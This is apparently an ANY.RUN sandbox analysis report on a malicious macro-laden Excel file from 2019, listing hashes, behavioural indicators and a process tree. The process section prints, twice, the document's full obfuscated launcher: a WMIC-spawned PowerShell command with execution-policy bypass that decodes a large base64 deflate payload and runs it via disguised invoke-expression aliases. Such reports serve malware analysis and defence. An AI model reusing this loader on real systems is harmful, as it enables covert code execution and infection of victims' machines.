analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

sample2.XLS

Full analysis: https://app.any.run/tasks/937774a2-8f88-4164-b790-aec18659dfd6
Verdict: Malicious activity
Analysis date: July 17, 2019, 07:59:59
OS: Windows 8.1 Professional (build: 9600, 64 bit)
Tags:
macros
macros-on-open
opendir
maldoc-5
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: autore, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Jul 16 12:19:40 2019, Security: 0
MD5:

9582B06BFF0F2B43D6693150FCB49C6A

SHA1:

2A90CA7964576B9210C8F35234214F32B412684E

SHA256:

1145EEE29B0805AFBB9CF03FA578CF79A1F94C43125AE6F3D2867810248FB555

SSDEEP:

3072:PjvlYkRIPPm3eNCZmbpoahZhC0cixIiG0iIFLR8m9xe0VukmBj:rvlYkRIPPm3eNCZmbpoahZhC0cixIiGb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Reads the machine GUID from the registry

      • wMIc.exe (PID: 2068)
      • rundll32.exe (PID: 2580)
      • powErsHell.exe (PID: 2812)
      • rundll32.exe (PID: 936)
      • RuntimeBroker.exe (PID: 2500)
    • Executed via WMI

      • powErsHell.exe (PID: 2812)
      • wMIc.exe (PID: 2068)
    • PowerShell script executed

      • powErsHell.exe (PID: 2812)
    • Creates files in the user directory

      • powErsHell.exe (PID: 2812)
    • Checks supported languages

      • powErsHell.exe (PID: 2812)
    • Reads Internet Cache Settings

      • rundll32.exe (PID: 2580)
      • rundll32.exe (PID: 936)
    • Application launched itself

      • rundll32.exe (PID: 2580)
    • Uses RUNDLL32.EXE to load library

      • powErsHell.exe (PID: 2812)
      • rundll32.exe (PID: 2580)
    • Executed via COM

      • RuntimeBroker.exe (PID: 2500)
      • rundll32.exe (PID: 1724)
  • INFO

    • Creates files in the user directory

      • EXCEL.EXE (PID: 1224)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 1224)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

CompObjUserType: (Foglio di lavoro di Microsoft Excel 2019
CompObjUserTypeLen: 42
HeadingPairs:
  • Fogli di lavoro
  • 1
TitleOfParts: 20190716-83748
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
ModifyDate: 2019:07:16 11:19:40
CreateDate: 2015:06:05 18:19:34
Software: Microsoft Excel
Author: autore
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
48
Monitored processes
10
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start excel.exe wmic.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs rundll32.exe no specs rundll32.exe no specs rundll32.exe no specs runtimebroker.exe no specs rundll32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1224"C:\Program Files\Microsoft Office 15\Root\Office15\EXCEL.EXE" "C:\Users\admin\Desktop\sample2.XLS"C:\Program Files\Microsoft Office 15\Root\Office15\EXCEL.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
15.0.4433.1506
2068wMIc 'prOcess' "cALl" crEAtE "powErsHell -NoNiNtErAC -NoPrOFi -WIn 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001 -EXECUtIoNpOLiC BYpAsS "\"`$kI="\" + ([ChAR]34).ToSTRing() + "\"MU(YY io.STreAMReadeR((YY IO.MicrosoftSiON.deFlaTestReAm([Io.MemOrYstReAM][CoNveRT]::FROMBaSe64STRInG('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' ) "\" +([Char]44).ToStriNg() +"\" [Io.MicrosoftSiON.MicrosoftsionMODE]::DEMicrosoftS ) ) "\" +([Char]44).ToStriNg() +"\"[TEXt.enCODIng]::aSCii)).READtoeNd()"\" + ([ChAR]34).ToSTRing() + "\".replace('Microsoft'"\" +([Char]44).ToStriNg() +"\"'compres');&('sa'+'l') ('YY') ('nEw-'+'OBjEc'+'T');&('s'+'al') ('MU') ('ie'+'X');MU(`$ki)"\"|& ( $SHeLLid[1]+$shellId[13]+'X')"C:\Windows\system32\wbem\wMIc.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.3.9600.16384 (winblue_rtm.130821-1623)
2508\??\C:\Windows\system32\conhost.exe 0xffffffffC:\Windows\system32\conhost.exewMIc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
6.3.9600.16384 (winblue_rtm.130821-1623)
2812powErsHell -NoNiNtErAC -NoPrOFi -WIn 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001 -EXECUtIoNpOLiC BYpAsS "\"`$kI="\" + ([ChAR]34).ToSTRing() + "\"MU(YY io.STreAMReadeR((YY IO.MicrosoftSiON.deFlaTestReAm([Io.MemOrYstReAM][CoNveRT]::FROMBaSe64STRInG('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' ) "\" +([Char]44).ToStriNg() +"\" [Io.MicrosoftSiON.MicrosoftsionMODE]::DEMicrosoftS ) ) "\" +([Char]44).ToStriNg() +"\"[TEXt.enCODIng]::aSCii)).READtoeNd()"\" + ([ChAR]34).ToSTRing() + "\".replace('Microsoft'"\" +([Char]44).ToStriNg() +"\"'compres');&('sa'+'l') ('YY') ('nEw-'+'OBjEc'+'T');&('s'+'al') ('MU') ('ie'+'X');MU(`$ki)"\"|& ( $SHeLLid[1]+$shellId[13]+'X')C:\Windows\System32\WindowsPowerShell\v1.0\powErsHell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.3.9600.17396 (winblue_r4.141007-2030)
1928\??\C:\Windows\system32\conhost.exe 0xffffffffC:\Windows\system32\conhost.exepowErsHell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
6.3.9600.16384 (winblue_rtm.130821-1623)
2580"C:\Windows\system32\rundll32.exe" InetCpl.cpl ClearMyTracksByProcess 260C:\Windows\system32\rundll32.exepowErsHell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.3.9600.16384 (winblue_rtm.130821-1623)
936C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:260 WinX:0 WinY:0 IEFrame:0000000000000000C:\Windows\system32\rundll32.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.3.9600.16384 (winblue_rtm.130821-1623)
3040"C:\Windows\system32\rundll32.exe" /s DllRegisterServerC:\Windows\system32\rundll32.exepowErsHell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.3.9600.16384 (winblue_rtm.130821-1623)
2500C:\Windows\System32\RuntimeBroker.exe -EmbeddingC:\Windows\System32\RuntimeBroker.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Runtime Broker
Exit code:
0
Version:
6.3.9600.17415 (winblue_r4.141028-1500)
1724C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -EmbeddingC:\Windows\System32\rundll32.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
